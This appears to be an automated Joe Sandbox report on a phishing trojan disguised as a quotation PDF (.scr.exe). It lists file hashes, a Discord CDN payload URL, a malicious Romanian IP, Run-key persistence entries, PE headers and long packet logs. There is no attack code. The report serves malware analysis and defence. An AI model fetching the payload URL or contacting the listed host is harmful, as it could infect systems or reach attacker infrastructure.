                                    https://github.com/mgravell/protobuf-netQUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311326145.0000000005450000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408924727.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000024.00000002.472719163.00000000029F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://cdn.discordapp.comAppLaunch.exe, 00000018.00000002.472848743.0000000006E15000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000018.00000002.472848743.0000000006EC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://github.com/syohex/java-simple-mine-sweeperC:donexx.exe, 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                          high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameAppLaunch.exe, 00000018.00000002.472848743.0000000006DE1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000018.00000002.472848743.0000000006EA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://github.com/syohex/java-simple-mine-sweeperaspnet_compiler.exefalse
                                              high
                                              http://cdn.discordapp.com/attachments/1152164172566630421/1153190859320328273/VvhAppLaunch.exe, 00000018.00000002.472848743.0000000006EA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://cdn.discordapAppLaunch.exe, 00000018.00000002.472848743.0000000006EB8000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                IP | Domain | Country | ASN | ASN Name | Malicious
                                                91.207.102.163 | unknown | Romania | 9009 | M247GB | true
                                                162.159.135.233 | cdn.discordapp.com | United States | 13335 | CLOUDFLARENETUS | false
                                                162.159.133.233 | unknown | United States | 13335 | CLOUDFLARENETUS | false
                                                Joe Sandbox Version:38.0.0 Beryl
                                                Analysis ID:1310586
                                                Start date and time:2023-09-19 09:20:08 +02:00
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 8m 5s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:39
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample file name:QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                                                Original Sample Name:QUOTATION_SEPT9FIBA00541PDF.scr.exe
                                                Detection:MAL
                                                Classification:mal100.phis.troj.spyw.evad.winEXE@20/4@2/3
                                                EGA Information:
                                                • Successful, ratio: 33.3%
                                                HDC Information:Failed
                                                HCA Information:
                                                • Successful, ratio: 96%
                                                • Number of executed functions: 427
                                                • Number of non-executed functions: 111
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                • Excluded domains from analysis (whitelisted): www.bing.com, kv601.prod.do.dsp.mp.microsoft.com, geover.prod.do.dsp.mp.microsoft.com, client.wns.windows.com, fs.microsoft.com, geo.prod.do.dsp.mp.microsoft.com, tse1.mm.bing.net, displaycatalog.mp.microsoft.com, arc.msn.com
                                                • Execution Graph export aborted for target Fhzejfh.exe, PID 5620 because it is empty
                                                • Execution Graph export aborted for target Fhzejfh.exe, PID 5712 because it is empty
                                                • Execution Graph export aborted for target QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, PID 6840 because it is empty
                                                • Execution Graph export aborted for target donexx.exe, PID 6436 because it is empty
                                                • Not all processes were analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                Time | Type | Description
                                                09:21:32 | API Interceptor | 13x Sleep call for process: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe modified
                                                09:21:36 | API Interceptor | 1x Sleep call for process: dllhost.exe modified
                                                09:21:49 | API Interceptor | 137772x Sleep call for process: AppLaunch.exe modified
                                                09:22:23 | API Interceptor | 13x Sleep call for process: donexx.exe modified
                                                09:22:35 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Fhzejfh C:\Users\user\AppData\Roaming\Fhzejfh.exe
                                                09:22:44 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Fhzejfh C:\Users\user\AppData\Roaming\Fhzejfh.exe
                                                                          Process:C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):927
                                                                          Entropy (8bit):5.364918554738821
                                                                          Encrypted:false
                                                                          SSDEEP:24:MLUE4K5E4KI2KDE4KhKYIqDcfJKhRAE4KzQKJE4Ad:MIHK5HKI2YHKhBUoRAHKz9JH0
                                                                          MD5:3800AA4EE7A10EDCAA5D3FCD96151E3A
                                                                          SHA1:C9B1228E62688CE877FA42D4EE5F406437049493
                                                                          SHA-256:D03F701D4E6D53F57DDC5B6D86183D1237CB966C931B6E82C5D45C7DBE8E06BE
                                                                          SHA-512:D1A25B9928A86A527FF880D79C6002314772E1BAAB41033F09E3433847BE56345B5ABE8176156786E487F18ADFC63FDD488108129BD6BA14E8660C81B46AFFB3
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\2bef38851483abae82f1172c1aaa604c\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\9d04ce1d8a3042f50b54c7f9ccdb4068\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2e14a1befe55e7d9ad2457ceb5267e36\System.Xml.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\1aff708a68d7a055e25b20efa5a36148\System.Net.Http.ni.dll",0..
                                                                          Process:C:\Users\user\AppData\Local\Temp\donexx.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):927
                                                                          Entropy (8bit):5.364918554738821
                                                                          Encrypted:false
                                                                          SSDEEP:24:MLUE4K5E4KI2KDE4KhKYIqDcfJKhRAE4KzQKJE4Ad:MIHK5HKI2YHKhBUoRAHKz9JH0
                                                                          MD5:3800AA4EE7A10EDCAA5D3FCD96151E3A
                                                                          SHA1:C9B1228E62688CE877FA42D4EE5F406437049493
                                                                          SHA-256:D03F701D4E6D53F57DDC5B6D86183D1237CB966C931B6E82C5D45C7DBE8E06BE
                                                                          SHA-512:D1A25B9928A86A527FF880D79C6002314772E1BAAB41033F09E3433847BE56345B5ABE8176156786E487F18ADFC63FDD488108129BD6BA14E8660C81B46AFFB3
                                                                          Malicious:false
                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\2bef38851483abae82f1172c1aaa604c\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\9d04ce1d8a3042f50b54c7f9ccdb4068\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2e14a1befe55e7d9ad2457ceb5267e36\System.Xml.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\1aff708a68d7a055e25b20efa5a36148\System.Net.Http.ni.dll",0..
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):363008
                                                                          Entropy (8bit):7.808967718409047
                                                                          Encrypted:false
                                                                          SSDEEP:6144:BKpYEOv3iCLLVNlvC7W22BTF20nJcpXNtbMOdsjxaRkc47:BKpKvSevCP8dJErIOdAc4
                                                                          MD5:5CA8DE5B7C87D36341F0578A03615AEE
                                                                          SHA1:6629EC5DDC56DE790468824F4DB7DB590D045F4A
                                                                          SHA-256:31E5881B79919C18F8444AC3300EB2A3550100754D869D19A9CCACAF874DF75B
                                                                          SHA-512:7296479DA65B9A0E4D6B5D83D11F313A66E933DBB14DBA1433C2CD62F75601ADEA60B2B023ADEE1BBCA0B9DCFA6F4D4F4F25F80FEF146AAAE49320B2D5D45F26
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 29%
                                                                          • Antivirus: Virustotal, Detection: 47%, Browse
                                                                          Process:C:\Users\user\AppData\Local\Temp\donexx.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):363008
                                                                          Entropy (8bit):7.808967718409047
                                                                          Encrypted:false
                                                                          SSDEEP:6144:BKpYEOv3iCLLVNlvC7W22BTF20nJcpXNtbMOdsjxaRkc47:BKpKvSevCP8dJErIOdAc4
                                                                          MD5:5CA8DE5B7C87D36341F0578A03615AEE
                                                                          SHA1:6629EC5DDC56DE790468824F4DB7DB590D045F4A
                                                                          SHA-256:31E5881B79919C18F8444AC3300EB2A3550100754D869D19A9CCACAF874DF75B
                                                                          SHA-512:7296479DA65B9A0E4D6B5D83D11F313A66E933DBB14DBA1433C2CD62F75601ADEA60B2B023ADEE1BBCA0B9DCFA6F4D4F4F25F80FEF146AAAE49320B2D5D45F26
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 29%
                                                                          • Antivirus: Virustotal, Detection: 47%, Browse
                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Entropy (8bit):7.826213413307594
                                                                          TrID:
                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                          File name:QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                                                                          File size:387'072 bytes
                                                                          MD5:404e68a96892ecfcb88a114e31abb55c
                                                                          SHA1:01db0f21268b21aeeced4445220c1ab38aa74913
                                                                          SHA256:4a564bf525a47e450c43e6dfa9bc9de4395e6dfb9707d1682f88dc86046e69a0
                                                                          SHA512:792847baef149cfb80bb48f6c83ee5b811c85f1b4ec833edd988911694b890c82e5db4b9b3410f195d0a7fd3414c7ad31d7b382faafbc3953cc604845568b93e
                                                                          SSDEEP:6144:X6vT/BZdLJXklw6HoG41k4uwJLeDeQv1W3sUcRdQBzUgOhbybIlIEpuS8Y7:qvbBZZUHoZk8Yp1W3jcRjgOhebr48Y
                                                                          TLSH:7C8412581B5CF822C2786FB94DE1C5A00A74CCA3A501F31B28847C6D6CB7FA2E85656B
                                                                          Icon Hash:0616262d632d9b2e
                                                                          Entrypoint:0x45971e
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x6507D879 [Mon Sep 18 04:56:25 2023 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                          Instruction
                                                                          jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x596d0 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x5a000 | 0x6c00 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x62000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x57724 | 0x57800 | False | 0.9560993303571429 | data | 7.941086335962951 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x5a000 | 0x6c00 | 0x6c00 | False | 0.37449363425925924 | data | 4.696027171989365 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x62000 | 0xc | 0x200 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x5a200 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 0 | | | 0.35365853658536583
RT_ICON | 0x5a878 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | | | 0.5026881720430108
RT_ICON | 0x5ab70 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | | | 0.6486486486486487
RT_ICON | 0x5aca8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.3355543710021322
RT_ICON | 0x5bb60 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.42418772563176893
RT_ICON | 0x5c418 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.4421965317919075
RT_ICON | 0x5c990 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.36493775933609957
RT_ICON | 0x5ef48 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | | | 0.4584896810506567
RT_ICON | 0x60000 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.8829787234042553
RT_GROUP_ICON | 0x60478 | 0x84 | data | | | 0.6363636363636364
RT_VERSION | 0x6050c | 0x3d4 | data | | | 0.4142857142857143
RT_MANIFEST | 0x608f0 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                          Sep 19, 2023 09:21:50.843184948 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.843192101 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.843297005 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.843302965 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.843401909 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.843498945 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.843585014 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.843590975 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.843616009 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.843640089 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.843849897 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.843996048 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.844003916 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.844017029 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.844110966 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.844118118 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.844239950 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.844295979 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.844302893 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.844396114 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.844461918 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.844469070 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.844552994 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.844605923 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.844613075 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.844731092 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.844786882 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.844794989 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.844903946 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.844965935 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.844974041 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.845026970 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.932219028 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.932468891 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.932837009 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.933170080 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.933479071 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.933609962 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.933685064 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.933685064 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.933708906 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.933760881 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.934134007 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.934201956 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.934223890 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.934284925 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.935096979 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.935159922 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.935183048 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.935239077 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.935611010 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.935678959 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.935745001 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.935806036 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.936367035 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.936429024 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.936573029 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.936645031 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.937220097 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.937288046 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.937374115 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.937436104 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.937977076 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.938040972 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.938292980 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.938354969 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.023633957 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.023807049 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.023828983 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.023893118 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.023993015 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.024097919 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.024163961 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.024766922 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.024823904 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.025016069 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.025077105 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.025559902 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.025778055 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.025994062 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.026011944 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.026021004 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.026191950 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.026789904 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.026957989 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.027060986 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.027067900 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.027215004 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.027221918 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.027394056 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.027448893 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.027456999 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.027513027 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.028127909 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.028186083 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.028234959 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.028289080 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.028796911 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.028945923 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.028959036 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.029046059 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.029722929 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.029778957 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.030142069 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.030206919 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.030284882 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.030345917 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.030451059 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.030509949 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.031228065 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.031286001 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.031397104 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.031464100 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.032025099 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.032080889 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.032299042 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.032350063 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.033549070 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.033605099 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.033972025 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.033979893 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.034171104 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.035454988 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.035499096 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.035518885 CEST49729443192.168.2.4162.159.133.233
